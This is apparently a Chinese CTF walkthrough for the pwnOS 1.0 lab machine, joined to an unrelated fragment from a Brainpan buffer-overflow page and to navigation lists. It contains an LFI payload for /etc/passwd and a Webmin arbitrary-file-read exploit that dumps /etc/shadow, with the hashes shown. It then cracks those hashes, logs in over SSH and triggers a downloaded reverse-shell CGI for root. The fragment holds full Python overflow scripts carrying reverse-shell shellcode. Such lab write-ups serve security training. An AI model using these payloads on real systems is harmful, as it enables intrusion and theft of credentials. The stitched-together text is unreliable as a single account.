首先先对80端口的网页进行渗透测试，初步看感觉网页上并无任何有效信息，但对参数的内容进行sql注入操作，发现会报错，并且提示文件包含等关键字，于是猜测具有文件包含漏洞。

根据以下payload，来包含文件，发现能够查看到passwd用户信息的敏感文件。但是shadow文件却无法查看，说明是网站用户的权限比较低，所以无法直接查看。
http://10.10.10.129/index1.php?help=&connect=/etc/passwd

根据nmap的扫描结果得知，80端口下有一个/php路径，并且10000端口存在webmin文件泄露的情况。

首先查看/php路径，里面只是一个phpmyadmin文件，点击进去就是一个登录框，但由于并不知道账号密码且无sql注入漏洞，暂时无从下手。

于是对10000端口的网站进行查看，经测试也无sql注入漏洞，但这明显是一个cms，于是查看该cms是否有可利用漏洞

查看是否存在可利用的漏洞，由于可利用很多，而且使用msf的漏洞过于无脑，为了学习所以采用pl脚本的漏洞，该漏洞可以查看任意文件。
searchsploit webmin

首先下载该漏洞脚本
searchsploit webmin -m 2017.pl

查看该脚本的使用说明
perl 2017.pl --help

于是根据该脚本的说明进行任意文件查询,基于这个webmin的url路径来任意查看shadow敏感文件。
perl 2017.pl 10.10.10.129 10000 /etc/shadow 0

将有密码的内容复制到一个文件中，即以下内容复制到一个文件中。
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

使用john碰撞出hash值的密码,其中userhash是保存以上内容的文件。于是碰撞出vmware用户的密码是h4ckm3
john userhash --wordlist=/usr/share/wordlists/rockyou.txt

于是使用远程登陆该用户，由于ssh版本服务不对应，需要使用-oHostKeyAlgorithms设置主机密钥。
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss [email protected]

接下来就是提权环节，查看sudo，发现该用户无任何可执行的sudo命令，并且计划任务也没有可以提权的。

于是可以尝试一种思路，先弄一个cgi后缀的可执行文件脚本，语言是pl的，然后使用2017.pl漏洞文件尝试去访问触发反弹shell的执行，从而获得root权限，因为这个漏洞文件能够访问shadow，那么大概率就是root了。
于是复制一份pl脚本的反弹shell.

修改脚本的监听ip，设置为当前kali的机器

kali建立http服务器，让靶机下载这个反弹shell文件。
python -m http.server 8085
靶机下载该文件,并设置文件的具备可执行权限。
wget http://10.10.10.128:8085/shell.cgi
chmod +x shell.cgi

kali开始监听,等待漏洞文件执行后，即可得到root
nc -lvnp 1234
然后再使用漏洞文件，去访问这个cgi文件触发执行。
perl 2017.pl 10.10.10.129 10000 /home/vmware/shell.cgi 0

pwnOS1.0另一种解法和提权思路

提权思路1

提权思路2

Holynix

HackademicRTB1

Tr0ll

Brainpan1

Billu_b0x

Kioptrix1.2

BNE0x03Simple

Nullbyte

FourandSix2.01

Narak

CONNECT THE DOTS

Me and My Girlfriend

Previous靶场总结知识 Nextpwn二进制漏洞

Last updated 11 months ago

#!/usr/bin/python import socket import time import sys #find badchars,cover ESP with possible badchars try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.10.1",9999)) badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" + "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" + "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" + "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" + "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" + "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" + "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" + "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" + "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" + "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" + "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" + "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" + "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" + "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" + "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" + "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) buffer = 'A' * 524 + 'B' * 4 + badchars print "\n[+]Send evil buffer many bytes(524 A, 4 B, 255 badchars)." s.send(buffer) s.close() time.sleep(2) except: print "\n[+] Could not connect,error!\n" sys.exit()

然后我们把原来ESP中C的位置填写为上述shellcode。shikata_ga_nai的编码方式对于我们进行免杀和绕过很有作用。但也会在生成几个“桩”用于解码。因此在构造payload的时候应该在ESP的开头位置填入若干个啥也不做的指令NOP（\x90），称为slide，防止“桩”被抹掉导致代码无法成功执行，再添加shellcode。当然，即使我们不适用编码进行免杀绕过，也可以添加几个NOP，滑过一些字节，保证shellcode不会被“抹掉”。完整的代码如下exp6.py: #!/usr/bin/python import socket import time import sys #set payload(windows_reverse_shell) for windows try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.10.1",9999)) shellcode = ("\xbb\xb4\xe0\x42\x87\xdd\xc2\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x52\x83\xc2\x04\x31\x5a\x0e\x03\xee\xee\xa0\x72\xf2" "\x07\xa6\x7d\x0a\xd8\xc7\xf4\xef\xe9\xc7\x63\x64\x59\xf8" "\xe0\x28\x56\x73\xa4\xd8\xed\xf1\x61\xef\x46\xbf\x57\xde" "\x57\xec\xa4\x41\xd4\xef\xf8\xa1\xe5\x3f\x0d\xa0\x22\x5d" "\xfc\xf0\xfb\x29\x53\xe4\x88\x64\x68\x8f\xc3\x69\xe8\x6c" "\x93\x88\xd9\x23\xaf\xd2\xf9\xc2\x7c\x6f\xb0\xdc\x61\x4a" "\x0a\x57\x51\x20\x8d\xb1\xab\xc9\x22\xfc\x03\x38\x3a\x39" "\xa3\xa3\x49\x33\xd7\x5e\x4a\x80\xa5\x84\xdf\x12\x0d\x4e" "\x47\xfe\xaf\x83\x1e\x75\xa3\x68\x54\xd1\xa0\x6f\xb9\x6a" "\xdc\xe4\x3c\xbc\x54\xbe\x1a\x18\x3c\x64\x02\x39\x98\xcb" "\x3b\x59\x43\xb3\x99\x12\x6e\xa0\x93\x79\xe7\x05\x9e\x81" "\xf7\x01\xa9\xf2\xc5\x8e\x01\x9c\x65\x46\x8c\x5b\x89\x7d" "\x68\xf3\x74\x7e\x89\xda\xb2\x2a\xd9\x74\x12\x53\xb2\x84" "\x9b\x86\x15\xd4\x33\x79\xd6\x84\xf3\x29\xbe\xce\xfb\x16" "\xde\xf1\xd1\x3e\x75\x08\xb2\x4a\x80\x18\xc2\x23\x96\x1c" "\xc6\x61\x1f\xfa\xac\x95\x76\x55\x59\x0f\xd3\x2d\xf8\xd0" "\xc9\x48\x3a\x5a\xfe\xad\xf5\xab\x8b\xbd\x62\x5c\xc6\x9f" "\x25\x63\xfc\xb7\xaa\xf6\x9b\x47\xa4\xea\x33\x10\xe1\xdd" "\x4d\xf4\x1f\x47\xe4\xea\xdd\x11\xcf\xae\x39\xe2\xce\x2f" "\xcf\x5e\xf5\x3f\x09\x5e\xb1\x6b\xc5\x09\x6f\xc5\xa3\xe3" "\xc1\xbf\x7d\x5f\x88\x57\xfb\x93\x0b\x21\x04\xfe\xfd\xcd" "\xb5\x57\xb8\xf2\x7a\x30\x4c\x8b\x66\xa0\xb3\x46\x23\xd0" "\xf9\xca\x02\x79\xa4\x9f\x16\xe4\x57\x4a\x54\x11\xd4\x7e" "\x25\xe6\xc4\x0b\x20\xa2\x42\xe0\x58\xbb\x26\x06\xce\xbc" "\x62") buffer = 'A' * 524 + '\xf3\x12\x17\x31' + '\x90' * 16 + shellcode print "\n[+]Send evil buffer many bytes(524 A, pos jmp ESP, 16 NOP, shellcode),including payload:windows_reverse_shell." s.send(buffer) s.close() time.sleep(2) except: print "\n[+] Could not connect,error!\n" sys.exit()

hashtagLampSecurityCTF4

hashtagLAMPSecurityCTF5

hashtagW1R3S 1.0.1

hashtagJARBAS

hashtagSickOS1.1

hashtagSickOS1.1解法二

hashtagPrime1

hashtagPrime1的另一种提取思路

hashtagLAMPSecurityCTF7

hashtagpWnOS2.0

hashtagpWnOS1.0

hashtagpwnOS1.0另一种解法和提权思路

hashtag提权思路1

hashtag提权思路2

hashtagHolynix

hashtagHackademicRTB1

hashtagTr0ll

hashtagBrainpan1

hashtagBillu_b0x

hashtagKioptrix1.2

hashtagBNE0x03Simple

hashtagNullbyte

hashtagFourandSix2.01

hashtagNarak

hashtagCONNECT THE DOTS

hashtagMe and My Girlfriend